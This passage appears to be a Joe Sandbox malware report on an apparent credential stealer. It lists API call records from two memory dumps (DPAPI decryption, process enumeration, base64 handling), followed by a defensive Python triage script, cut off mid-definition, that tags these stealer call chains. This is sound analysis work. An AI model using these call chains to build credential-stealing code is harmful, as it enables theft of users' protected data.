                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004072B4
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004072E1
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407CF0,80000001,00416414), ref: 00407304
                                              • LocalFree.KERNEL32(?,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 0040730E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                              • String ID:
                                              • API String ID: 3657800372-0
                                              • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                              • Instruction ID: 53cc3c192cf3f0b8553079c3b9831d6236397efc4a83699197ab53cf729bcbdc
                                              • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                              • Instruction Fuzzy Hash: 43010075E45308BBEB14DFA4DC45F9E7779AB44B00F104556FB05BA2C0D670AA009B55
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 04847514
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0484751B
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 04847548
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0484756B
                                              • LocalFree.KERNEL32(?), ref: 04847575
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                              • String ID:
                                              • API String ID: 2609814428-0
                                              • Opcode ID: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                              • Instruction ID: 12817fdeae5a9115aded1962d84d349431a50ce38090c57489add4cb03fc5853
                                              • Opcode Fuzzy Hash: 71551e695a0caf509547d065f2a667422435cc09d56db0d1c7835a16714f6d9a
                                              • Instruction Fuzzy Hash: FE010CB5A45308BBEB10DFE8DD46F9D7779AB44B04F108546FB05AA2C0D7B0AB008B65
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
                                              • Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
                                              • Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
                                              • CloseHandle.KERNEL32(00420ACE), ref: 0041980A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                              • Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
                                              • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                              • Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04859A15
                                              • Process32First.KERNEL32(00420ACE,00000128), ref: 04859A29
                                              • Process32Next.KERNEL32(00420ACE,00000128), ref: 04859A3E
                                              • StrCmpCA.SHLWAPI(?,00000000), ref: 04859A53
                                              • CloseHandle.KERNEL32(00420ACE), ref: 04859A71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 420147892-0
                                              • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                              • Instruction ID: 68b28af1401b5dbea2d4d03e27e1154141eb6d68d4e21d7ec1f942641c5f36d7
                                              • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                              • Instruction Fuzzy Hash: 6A010CB5E05208EBCB21DFA4CD84BDDB7B9BB08700F404689E909D6250EB70AB84CF61
                                              APIs
                                              • CoCreateInstance.COMBASE(0041E120,00000000,00000001,0041E110,00000000), ref: 004139A8
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00413A00
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharCreateInstanceMultiWide
                                              • String ID: ,<A
                                              • API String ID: 123533781-3158208111
                                              • Opcode ID: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                              • Instruction ID: 4ceafe5fcd3fa6382eb1302e1b13d25b09f52af09297020757b8d8bc714daff3
                                              • Opcode Fuzzy Hash: 6035193581f456c28db8c3dbbb17385d9df3aded10c54e768140ce262fc94c92
                                              • Instruction Fuzzy Hash: A8410670A00A28AFDB24DF58CC95BDBB7B5AB48302F4041D9E608E7290E7B16EC5CF50
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215E8,00420D79), ref: 0484E809
                                              • StrCmpCA.SHLWAPI(?,004215F0), ref: 0484E859
                                              • StrCmpCA.SHLWAPI(?,004215F4), ref: 0484E86F
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0484EF46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                              • String ID:
                                              • API String ID: 433455689-0
                                              • Opcode ID: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                              • Instruction ID: 86904e06d8b2176c9c64a976ccfde03a0bff3dfdbaad14eca666662694c5c9fc
                                              • Opcode Fuzzy Hash: f2c5642d96243640a0ff45e34ac7c9947fdf93cb12fee13133c104cf864f9802
                                              • Instruction Fuzzy Hash: 9712ED719002189BEB5CFB64DCD5EED7335AF54309F404BA9990AA60A0EEB47F48CB52
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                              • Process32First.KERNEL32(?,00000128), ref: 0041886E
                                              • Process32Next.KERNEL32(?,00000128), ref: 00418883
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • CloseHandle.KERNEL32(?), ref: 004188F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                              • String ID:
                                              • API String ID: 1066202413-0
                                              • Opcode ID: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                              • Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
                                              • Opcode Fuzzy Hash: 9d9ec364ee6a93562b6efec49ca0d433d4cf16d75aacd9b160be087bee1fd478
                                              • Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5
                                              APIs
                                              • CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000,?,004051D4), ref: 00419050
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptString
                                              • String ID:
                                              • API String ID: 80407269-0
                                              • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                              • Instruction ID: a6271c561c9c1d5471e6a4d7c0a7a185f0e3b346a55a3ee80b23d48c8130208f
                                              • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                              • Instruction Fuzzy Hash: 6C11F874604208EFDB00CF54D894BAB37A9AF89310F109449F91A8B350D779ED818BA9
                                              APIs
                                              • CryptBinaryToStringA.CRYPT32(00000000,0484543B,40000001,00000000,00000000,?,0484543B), ref: 048592B7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptString
                                              • String ID:
                                              • API String ID: 80407269-0
                                              • Opcode ID: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                              • Instruction ID: 369b7b46f7e2bc3f1919d755422e62cc854789808d229ffb4cc54c47f1bc54ae
                                              • Opcode Fuzzy Hash: 5fcb9d7601459770c1d68cf3a08c3d703ee7026a9ffe2d555f4c4387a797331f
                                              • Instruction Fuzzy Hash: FD11FBB0604208EFDF00CF54D844FAA33A9AF89714F00AA58FD19CB260D771F9419B60
                                              APIs
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4A6
                                              • LocalAlloc.KERNEL32(00000040,?,?,?,048451A5,00000000,?), ref: 0484A4B8
                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4E1
                                              • LocalFree.KERNEL32(?,?,?,?,048451A5,00000000,?), ref: 0484A4F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: BinaryCryptLocalString$AllocFree
                                              • String ID:
                                              • API String ID: 4291131564-0
                                              • Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                              • Instruction ID: 806137fd8be09cd558ff58c693e26ca89d90b43ff21bd5a377c707f80dd598a0
                                              • Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
                                              • Instruction Fuzzy Hash: F011C074641208EFEB14CFA4CC95FAA77B6EB88704F208549FD159F290D7B2AA40CB50
                                              APIs
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                              • memcpy.MSVCRT(?,?,?), ref: 0040A316
                                              • LocalFree.KERNEL32(?), ref: 0040A323
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                              • String ID:
                                              • API String ID: 3243516280-0
                                              • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                              • Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
                                              • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                              • Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61
                                              APIs
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0484A53B
                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 0484A55A
                                              • memcpy.MSVCRT(?,?,?), ref: 0484A57D
                                              • LocalFree.KERNEL32(?), ref: 0484A58A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                              • String ID:
                                              • API String ID: 3243516280-0
                                              • Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                              • Instruction ID: 8d55bcba1077255c873603bf05d4ac5b851eaf6e994eb87a2a0d4ba7cce90ad7
                                              • Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
                                              • Instruction Fuzzy Hash: E0118AB8A01209EFCB04DFA4D985AAEB7B5FF89300F108559FD1597350D770AA50CFA1
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02CA5928,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02CA5928,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02CA5928,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                              • wsprintfA.USER32 ref: 00417C47
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                              • String ID:
                                              • API String ID: 362916592-0
                                              • Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                              • Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
                                              • Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
                                              • Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: 2b78c59b96fc82fad8d457a6a0d021f053e03ac70cdb350827c14b5a28d45c4a
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: CF3158B6910609CFEB11CF99C880AAEBBF5FF49328F14454AD541E7310D7B1EA45CBA4
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SystemTimelstrcpy
                                              • String ID:
                                              • API String ID: 62757014-0
                                              • Opcode ID: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                              • Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
                                              • Opcode Fuzzy Hash: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                              • Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                              • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                              • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                              • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(0041D1D8), ref: 0485D486
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                              • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                              • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                              • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
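The function records above list each function's direct Win32 calls in execution order, and the stealer-relevant logic is readable from that order alone: CryptStringToBinaryA, LocalAlloc, CryptStringToBinaryA, LocalFree is the two-pass base64 decode (first call sizes the buffer, second fills it; dwFlags 00000001 is CRYPT_STRING_BASE64, and the LocalAlloc flag 00000040 is LPTR, i.e. fixed and zero-initialised); CryptUnprotectData, LocalAlloc, memcpy, LocalFree is the DPAPI unprotect chain credential stealers use on locally protected data; CreateToolhelp32Snapshot, Process32First, Process32Next with CloseHandle is process enumeration; CryptBinaryToStringA with 40000001 is base64 encoding with CRYPT_STRING_NOCRLF. A second thing worth reading off the records is that several Opcode IDs (7a2dd4ec..., 5fcb9d76..., 8b874fd8...) appear once at Offset 00400000 (based on PE: true) and once at Offset 04840000 (based on PE: false) with different Instruction IDs, so the 04840000 region carries the same function bodies as the mapped PE. The following triage script is an added example, not Joe Sandbox code and not part of the sample: it parses records in the report's own text layout, rebuilds each function's direct API sequence, tags these call chains, decodes the Crypt*String* flag words, and pairs functions across dumps by Opcode ID. The input text is three records copied from this page; the signature labels are this example's own names, not Joe Sandbox signature names.

```python
"""Added triage helper, not Joe Sandbox code and not part of the sample: parses the
function records above, rebuilds each function's direct API sequence, tags stealer
call chains, decodes Crypt*String* flags and pairs functions across the two dumps."""
import re
from collections import defaultdict

# Constructed input: three records copied from this report, cut down to the API,
# Source File and Opcode ID lines the parser reads.
SAMPLE = """\
APIs
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4A6
• LocalAlloc.KERNEL32(00000040,?,?,?,048451A5,00000000,?), ref: 0484A4B8
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4E1
• LocalFree.KERNEL32(?,?,?,?,048451A5,00000000,?), ref: 0484A4F6
• Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
• Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
• memcpy.MSVCRT(?,?,?), ref: 0040A316
• LocalFree.KERNEL32(?), ref: 0040A323
• Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0484A53B
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0484A55A
• memcpy.MSVCRT(?,?,?), ref: 0484A57D
• LocalFree.KERNEL32(?), ref: 0484A58A
• Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
• Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
"""

API_RE = re.compile(r"^\s*•\s*([A-Za-z0-9_]+)\.([A-Za-z0-9]+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
OPCODE_RE = re.compile(r"Opcode ID: ([0-9a-f]{64})")

# Ordered subsequences of a function's own calls; labels are this example's, not Joe Sandbox's.
SIGNATURES = {
    "dpapi_decrypt": ["CryptUnprotectData", "LocalAlloc", "memcpy", "LocalFree"],
    "base64_decode_two_pass": ["CryptStringToBinaryA", "LocalAlloc", "CryptStringToBinaryA", "LocalFree"],
    "base64_encode": ["CryptBinaryToStringA"],
    "process_enumeration": ["CreateToolhelp32Snapshot", "Process32First", "Process32Next"],
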